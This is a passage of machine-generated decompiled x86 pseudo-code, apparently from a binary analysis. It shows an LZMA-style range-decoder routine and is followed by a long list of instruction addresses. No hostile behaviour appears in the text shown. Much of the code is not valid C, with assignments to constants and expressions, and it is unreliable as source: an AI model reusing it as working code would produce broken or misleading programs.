											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                0x00000000
                0x0040680a
                0x0040680a
                0x0040680e
                0x00406833
                0x0040683d
                0x00000000
                0x00406810
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681d
                0x00406821
                0x00406821
                0x00406824
                0x004068fe
                0x004068fe
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00000000
                0x00406261
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00000000
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00000000
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00406591
                0x00406595
                0x0040659c
                0x0040659f
                0x004065a2
                0x004065ac
                0x00000000
                0x004065ac
                0x00406597
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x00000000
                0x004068f7
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x00000000
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
